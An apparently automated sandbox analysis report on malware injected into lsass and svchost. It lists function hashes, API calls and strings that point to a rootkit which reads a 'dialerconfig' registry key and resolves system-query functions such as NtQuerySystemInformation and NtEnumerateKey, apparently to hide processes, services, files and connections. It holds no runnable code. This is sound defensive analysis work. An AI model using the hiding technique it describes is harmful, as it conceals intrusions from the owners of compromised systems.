                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301
                                                                          Function 00000140ADFC73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300
                                                                          Function 00000140AE861BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381
                                                                          Function 00000140AE861268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1

                                                                          Execution Graph

                                                                          Execution Coverage:0.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:81
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 14911 195dd5c1abc 14917 195dd5c1628 GetProcessHeap 14911->14917 14913 195dd5c1ad2 Sleep SleepEx 14915 195dd5c1acb 14913->14915 14915->14913 14916 195dd5c1598 StrCmpIW StrCmpW 14915->14916 14962 195dd5c18b4 14915->14962 14916->14915 14918 195dd5c1648 __std_exception_copy 14917->14918 14979 195dd5c1268 GetProcessHeap 14918->14979 14920 195dd5c1650 14921 195dd5c1268 2 API calls 14920->14921 14922 195dd5c1661 14921->14922 14923 195dd5c1268 2 API calls 14922->14923 14924 195dd5c166a 14923->14924 14925 195dd5c1268 2 API calls 14924->14925 14926 195dd5c1673 14925->14926 14927 195dd5c168e RegOpenKeyExW 14926->14927 14928 195dd5c16c0 RegOpenKeyExW 14927->14928 14929 195dd5c18a6 14927->14929 14930 195dd5c16ff RegOpenKeyExW 14928->14930 14931 195dd5c16e9 14928->14931 14929->14915 14933 195dd5c1723 14930->14933 14934 195dd5c173a RegOpenKeyExW 14930->14934 14983 195dd5c12bc RegQueryInfoKeyW 14931->14983 14994 195dd5c104c RegQueryInfoKeyW 14933->14994 14937 195dd5c175e 14934->14937 14938 195dd5c1775 RegOpenKeyExW 14934->14938 14935 195dd5c16f5 RegCloseKey 14935->14930 14942 195dd5c12bc 11 API calls 14937->14942 14939 195dd5c17b0 RegOpenKeyExW 14938->14939 14940 195dd5c1799 14938->14940 14944 195dd5c17d4 14939->14944 14945 195dd5c17eb RegOpenKeyExW 14939->14945 14943 195dd5c12bc 11 API calls 14940->14943 14946 195dd5c176b RegCloseKey 14942->14946 14947 195dd5c17a6 RegCloseKey 14943->14947 14948 195dd5c12bc 11 API calls 14944->14948 14949 195dd5c180f 14945->14949 14950 195dd5c1826 RegOpenKeyExW 14945->14950 14946->14938 14947->14939 14951 195dd5c17e1 RegCloseKey 14948->14951 14952 195dd5c104c 4 API calls 14949->14952 14953 195dd5c1861 RegOpenKeyExW 14950->14953 14954 195dd5c184a 14950->14954 14951->14945 14957 195dd5c181c RegCloseKey 14952->14957 14955 195dd5c189c RegCloseKey 14953->14955 14956 195dd5c1885 14953->14956 14958 195dd5c104c 4 API calls 14954->14958 14955->14929 14959 195dd5c104c 4 API calls 14956->14959 14957->14950 14960 195dd5c1857 RegCloseKey 14958->14960 14961 195dd5c1892 RegCloseKey 14959->14961 14960->14953 14961->14955 15006 195dd5c14a4 14962->15006 15000 195dd5d6168 14979->15000 14981 195dd5c1283 GetProcessHeap 14982 195dd5c12ae __std_exception_copy 14981->14982 14982->14920 14984 195dd5c148a __free_lconv_num 14983->14984 14985 195dd5c1327 GetProcessHeap 14983->14985 14984->14935 14991 195dd5c133e __std_exception_copy __free_lconv_num 14985->14991 14986 195dd5c1352 RegEnumValueW 14986->14991 14987 195dd5c1476 GetProcessHeap 14987->14984 14989 195dd5c13d3 GetProcessHeap 14989->14991 14990 195dd5c141e lstrlenW GetProcessHeap 14990->14991 14991->14986 14991->14987 14991->14989 14991->14990 14992 195dd5c13f3 GetProcessHeap 14991->14992 14993 195dd5c1443 StrCpyW 14991->14993 15001 195dd5c152c 14991->15001 14992->14991 14993->14991 14995 195dd5c11b5 RegCloseKey 14994->14995 14997 195dd5c10bf __std_exception_copy __free_lconv_num 14994->14997 14995->14934 14996 195dd5c10cf RegEnumValueW 14996->14997 14997->14995 14997->14996 14998 195dd5c114e GetProcessHeap 14997->14998 14999 195dd5c116e GetProcessHeap 14997->14999 14998->14997 14999->14997 15002 195dd5c157c 15001->15002 15003 195dd5c1546 15001->15003 15002->14991 15003->15002 15004 195dd5c155d StrCmpIW 15003->15004 15005 195dd5c1565 StrCmpW 15003->15005 15004->15003 15005->15003 15007 195dd5c14e1 GetProcessHeap 15006->15007 15008 195dd5c14c1 GetProcessHeap 15006->15008 15012 195dd5d6180 15007->15012 15010 195dd5c14da __free_lconv_num 15008->15010 15010->15007 15010->15008 15013 195dd5d6182 15012->15013 15014 195dd59273c 15016 195dd59276a 15014->15016 15015 195dd592858 LoadLibraryA 15015->15016 15016->15015 15017 195dd5928d4 15016->15017

                                                                          Executed Functions

                                                                          Function 00000195DD5C328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: b559a2181ff40e2a117a780b745b7d932bb3298ad3057c49ecb9ab2035d3dd06
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: 9C11C030A12F0C82FB72ABE9F9387D923D7A784B85F504124DA06E1EA5EFB9C044C350
                                                                          Function 00000195DD5C1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000195DD5C1628: GetProcessHeap.KERNEL32 ref: 00000195DD5C1633
                                                                            • Part of subcall function 00000195DD5C1628: HeapAlloc.KERNEL32 ref: 00000195DD5C1642
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16B2
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16DF
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C16F9
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1719
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1734
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1754
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C176F
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C178F
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17AA
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17CA
                                                                          • Sleep.KERNEL32 ref: 00000195DD5C1AD7
                                                                          • SleepEx.KERNEL32 ref: 00000195DD5C1ADD
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17E5
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1805
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1820
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1840
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C185B
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C187B
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1896
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: f3b7e964aa4799e71de0d0524ef43308711ea80b0fc304bbb8b55dd9ae371198
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: C7315171202E0951FF52ABAADA70BE963E7AB54BD4F0454218E0EE7FD5FE20C861C750
                                                                          Function 00000195DD5C3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 57 195dd5c3844-195dd5c384f 58 195dd5c3851-195dd5c3864 StrCmpNIW 57->58 59 195dd5c3869-195dd5c3870 57->59 58->59 60 195dd5c3866 58->60 60->59
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: dialer
                                                                          • API String ID: 0-3528709123
                                                                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction ID: 8525adf6a2d64dd7061414e58bca951bdbbd2a01b88122cd2fc985ec43bc3963
                                                                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction Fuzzy Hash: 89D0A770353B0DC7FF26DFEA88E46E423E2EB08744F884030C90052A50DB18898D9B20
                                                                          Function 00000195DD59273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 3c42989a6f1da65d8c668265381177c755b331e9ddf0642a5a91f75fe2288bf4
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: DF612632B01A90C7DB56CF65D020BBD73D7F754BA4F988125DE5927B88DA38D892CB00

                                                                          Non-executed Functions

                                                                          Function 00000195DD5C2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 369 195dd5c2b2c-195dd5c2ba5 call 195dd5e2ce0 372 195dd5c2ee0-195dd5c2f03 369->372 373 195dd5c2bab-195dd5c2bb1 369->373 373->372 374 195dd5c2bb7-195dd5c2bba 373->374 374->372 375 195dd5c2bc0-195dd5c2bc3 374->375 375->372 376 195dd5c2bc9-195dd5c2bd9 GetModuleHandleA 375->376 377 195dd5c2bed 376->377 378 195dd5c2bdb-195dd5c2beb call 195dd5d6090 376->378 380 195dd5c2bf0-195dd5c2c0e 377->380 378->380 380->372 383 195dd5c2c14-195dd5c2c33 StrCmpNIW 380->383 383->372 384 195dd5c2c39-195dd5c2c3d 383->384 384->372 385 195dd5c2c43-195dd5c2c4d 384->385 385->372 386 195dd5c2c53-195dd5c2c5a 385->386 386->372 387 195dd5c2c60-195dd5c2c73 386->387 388 195dd5c2c83 387->388 389 195dd5c2c75-195dd5c2c81 387->389 390 195dd5c2c86-195dd5c2c8a 388->390 389->390 391 195dd5c2c9a 390->391 392 195dd5c2c8c-195dd5c2c98 390->392 393 195dd5c2c9d-195dd5c2ca7 391->393 392->393 394 195dd5c2d9d-195dd5c2da1 393->394 395 195dd5c2cad-195dd5c2cb0 393->395 396 195dd5c2ed2-195dd5c2eda 394->396 397 195dd5c2da7-195dd5c2daa 394->397 398 195dd5c2cc2-195dd5c2ccc 395->398 399 195dd5c2cb2-195dd5c2cbf call 195dd5c199c 395->399 396->372 396->387 402 195dd5c2dbb-195dd5c2dc5 397->402 403 195dd5c2dac-195dd5c2db8 call 195dd5c199c 397->403 400 195dd5c2cce-195dd5c2cdb 398->400 401 195dd5c2d00-195dd5c2d0a 398->401 399->398 400->401 405 195dd5c2cdd-195dd5c2cea 400->405 406 195dd5c2d3a-195dd5c2d3d 401->406 407 195dd5c2d0c-195dd5c2d19 401->407 409 195dd5c2df5-195dd5c2df8 402->409 410 195dd5c2dc7-195dd5c2dd4 402->410 403->402 414 195dd5c2ced-195dd5c2cf3 405->414 416 195dd5c2d3f-195dd5c2d49 call 195dd5c1bbc 406->416 417 195dd5c2d4b-195dd5c2d58 lstrlenW 406->417 407->406 415 195dd5c2d1b-195dd5c2d28 407->415 412 195dd5c2dfa-195dd5c2e03 call 195dd5c1bbc 409->412 413 195dd5c2e05-195dd5c2e12 lstrlenW 409->413 410->409 419 195dd5c2dd6-195dd5c2de3 410->419 412->413 439 195dd5c2e4a-195dd5c2e55 412->439 423 195dd5c2e14-195dd5c2e1e 413->423 424 195dd5c2e35-195dd5c2e3f call 195dd5c3844 413->424 421 195dd5c2d93-195dd5c2d98 414->421 422 195dd5c2cf9-195dd5c2cfe 414->422 425 195dd5c2d2b-195dd5c2d31 415->425 416->417 416->421 427 195dd5c2d5a-195dd5c2d64 417->427 428 195dd5c2d7b-195dd5c2d8d call 195dd5c3844 417->428 429 195dd5c2de6-195dd5c2dec 419->429 432 195dd5c2e42-195dd5c2e44 421->432 422->401 422->414 423->424 433 195dd5c2e20-195dd5c2e33 call 195dd5c152c 423->433 424->432 425->421 434 195dd5c2d33-195dd5c2d38 425->434 427->428 437 195dd5c2d66-195dd5c2d79 call 195dd5c152c 427->437 428->421 428->432 438 195dd5c2dee-195dd5c2df3 429->438 429->439 432->396 432->439 433->424 433->439 434->406 434->425 437->421 437->428 438->409 438->429 444 195dd5c2ecc-195dd5c2ed0 439->444 445 195dd5c2e57-195dd5c2e5b 439->445 444->396 448 195dd5c2e63-195dd5c2e7d call 195dd5c85c0 445->448 449 195dd5c2e5d-195dd5c2e61 445->449 450 195dd5c2e80-195dd5c2e83 448->450 449->448 449->450 453 195dd5c2e85-195dd5c2ea3 call 195dd5c85c0 450->453 454 195dd5c2ea6-195dd5c2ea9 450->454 453->454 454->444 456 195dd5c2eab-195dd5c2ec9 call 195dd5c85c0 454->456 456->444
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                          • Instruction ID: dde7fd9efa89a5466707bb46948bcd2f38f9c7ac15f82b741b3087f18559b81d
                                                                          • Opcode Fuzzy Hash: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                          • Instruction Fuzzy Hash: 40B1AF76212E5882EB669FA9D460BE973E6FB54B84F485016EE09B3F94EF34CC41C740
                                                                          Function 00000195DD5C7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: fc690ca620e4485241193952ba8c83509054a4c62fcfc94005514e0c22233189
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: B0314F72205F848AEB619FA4E8607ED73E5F784744F44442ADA4EA7F98EF38C549C710
                                                                          Function 00000195DD5CD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 88954bb95814ee6b498564cf1bdcac9ec7b9223e226e11f4f982859e9a819e51
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 77313A32215F8486EB618B69E8503DE73E5F789794F500126EA9D93F98EF38C546CB00
                                                                          Function 00000195DD5C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 3fed60f760ab3f32da691e52dbf4ab303354c7f47779857e17f14048716fb99a
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: A1711C36311F1886EB119FA6E860AD923F6FB85B89F005111DE4EA7F69EF34C485C750
                                                                          Function 00000195DD5C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: 495f4bd1ccfcfb5c7fe309b38a271ae55a6fce5f460d804d76d8676db85ca4e3
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 30515B36201F8886EB51CFA6E46879A77E2F789F89F044124DA4957B18DF3CC04ACB10
                                                                          Function 00000195DD5C1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 0a117424bb8ec17e06fa24497d1726645dd05d6d29179111a98c9b800477247c
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: D1318274142E4EE0FB17EFE9E871AE463E3B714398FC450139449B2E759E78824AD760
                                                                          Function 00000195DD596910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 211 195dd596910-195dd596916 212 195dd596951-195dd59695b 211->212 213 195dd596918-195dd59691b 211->213 214 195dd596a78-195dd596a8d 212->214 215 195dd59691d-195dd596920 213->215 216 195dd596945-195dd596984 call 195dd596fc0 213->216 220 195dd596a8f 214->220 221 195dd596a9c-195dd596ab6 call 195dd596e54 214->221 218 195dd596922-195dd596925 215->218 219 195dd596938 __scrt_dllmain_crt_thread_attach 215->219 234 195dd596a52 216->234 235 195dd59698a-195dd59699f call 195dd596e54 216->235 226 195dd596931-195dd596936 call 195dd596f04 218->226 227 195dd596927-195dd596930 218->227 224 195dd59693d-195dd596944 219->224 222 195dd596a91-195dd596a9b 220->222 232 195dd596aef-195dd596b20 call 195dd597190 221->232 233 195dd596ab8-195dd596aed call 195dd596f7c call 195dd596e1c call 195dd597318 call 195dd597130 call 195dd597154 call 195dd596fac 221->233 226->224 243 195dd596b22-195dd596b28 232->243 244 195dd596b31-195dd596b37 232->244 233->222 238 195dd596a54-195dd596a69 234->238 246 195dd5969a5-195dd5969b6 call 195dd596ec4 235->246 247 195dd596a6a-195dd596a77 call 195dd597190 235->247 243->244 248 195dd596b2a-195dd596b2c 243->248 249 195dd596b7e-195dd596b94 call 195dd59268c 244->249 250 195dd596b39-195dd596b43 244->250 261 195dd5969b8-195dd5969dc call 195dd5972dc call 195dd596e0c call 195dd596e38 call 195dd59ac0c 246->261 262 195dd596a07-195dd596a11 call 195dd597130 246->262 247->214 255 195dd596c1f-195dd596c2c 248->255 268 195dd596b96-195dd596b98 249->268 269 195dd596bcc-195dd596bce 249->269 256 195dd596b4f-195dd596b5d call 195dd5a5780 250->256 257 195dd596b45-195dd596b4d 250->257 264 195dd596b63-195dd596b78 call 195dd596910 256->264 278 195dd596c15-195dd596c1d 256->278 257->264 261->262 314 195dd5969de-195dd5969e5 __scrt_dllmain_after_initialize_c 261->314 262->234 282 195dd596a13-195dd596a1f call 195dd597180 262->282 264->249 264->278 268->269 275 195dd596b9a-195dd596bbc call 195dd59268c call 195dd596a78 268->275 276 195dd596bd0-195dd596bd3 269->276 277 195dd596bd5-195dd596bea call 195dd596910 269->277 275->269 308 195dd596bbe-195dd596bc6 call 195dd5a5780 275->308 276->277 276->278 277->278 296 195dd596bec-195dd596bf6 277->296 278->255 301 195dd596a21-195dd596a2b call 195dd597098 282->301 302 195dd596a45-195dd596a50 282->302 298 195dd596c01-195dd596c11 call 195dd5a5780 296->298 299 195dd596bf8-195dd596bff 296->299 298->278 299->278 301->302 313 195dd596a2d-195dd596a3b 301->313 302->238 308->269 313->302 314->262 315 195dd5969e7-195dd596a04 call 195dd59abc8 314->315 315->262
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
